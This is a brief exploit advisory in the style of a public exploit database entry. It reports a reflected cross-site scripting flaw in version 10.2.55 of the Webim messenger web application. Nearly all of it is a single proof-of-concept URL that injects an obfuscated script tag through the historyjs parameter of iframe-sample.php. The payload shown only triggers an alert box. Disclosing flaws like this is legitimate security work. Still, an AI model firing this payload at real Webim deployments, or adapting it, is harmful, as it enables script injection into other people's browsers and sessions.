# Exploit Title: XSS in WEBIM <http://WEBIM.RU> web application
# Date: 10.08.2021
# Exploit Author: ASCII
# Vendor Homepage: HTTPS://WEBIM.RU
# Version: 10.2.55
# Tested on: 10.2.55
Webim messanger XSS

POC

https://[location].webim.ru/webim/iframe-sample.php?historyjs=1%27"()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>&location=test&redirected=0&webim-visitor=2&webimVisitor=1